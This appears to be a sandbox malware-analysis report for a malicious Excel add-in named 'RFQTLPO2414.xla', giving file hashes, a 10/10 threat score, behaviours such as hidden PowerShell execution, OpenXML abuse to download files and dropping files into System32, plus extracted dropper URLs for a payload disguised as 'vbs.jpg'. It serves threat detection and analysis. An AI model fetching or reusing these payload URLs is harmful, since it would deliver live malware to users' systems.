Overview

overview

10

Static

static

1

RFQTLPO2414.xls

windows7-x64

10

RFQTLPO2414.xls

windows10-2004-x64

1

Sharing

Copy URL
Twitter E-mail

General

  • Target

    RFQTLPO2414.xla

  • Size

    370KB

  • Sample

    240821-n41wzs1aqn

  • MD5

    9b2f48677d72f952d32113a2656534c9

  • SHA1

    557f90e41483f5dac7f42acabfad8a6b96b49422

  • SHA256

    9d5316038e869e6de1069cd0579e7e78f2a36f526bc3275ee67fe787ae7e6ea3

  • SHA512

    4f2de924ccc32b25c175fabd3b148e227cd731708c446ffb9f7d00ff54b435faea464b2b3a98a5f183c2338972dc60bea3cd24154fd5bd69e226a7094dbaa1ea

  • SSDEEP

    6144:Rlp+aufDHYN/5MXBoyP3wqohOt4KnOFYnITzFnpM6zJAbpvjlhfEC:RlKfu5G43LnB66z2bpv4C

Score
10/10
discoveryexecution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
exe.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

Targets

    • Target

      RFQTLPO2414.xla

    • Size

      370KB

    • MD5

      9b2f48677d72f952d32113a2656534c9

    • SHA1

      557f90e41483f5dac7f42acabfad8a6b96b49422

    • SHA256

      9d5316038e869e6de1069cd0579e7e78f2a36f526bc3275ee67fe787ae7e6ea3

    • SHA512

      4f2de924ccc32b25c175fabd3b148e227cd731708c446ffb9f7d00ff54b435faea464b2b3a98a5f183c2338972dc60bea3cd24154fd5bd69e226a7094dbaa1ea

    • SSDEEP

      6144:Rlp+aufDHYN/5MXBoyP3wqohOt4KnOFYnITzFnpM6zJAbpvjlhfEC:RlKfu5G43LnB66z2bpv4C

    Score
    10/10
    discoveryexecution

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

      execution

    • Abuses OpenXML format to download file from external location

    • Drops file in System32 directory

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks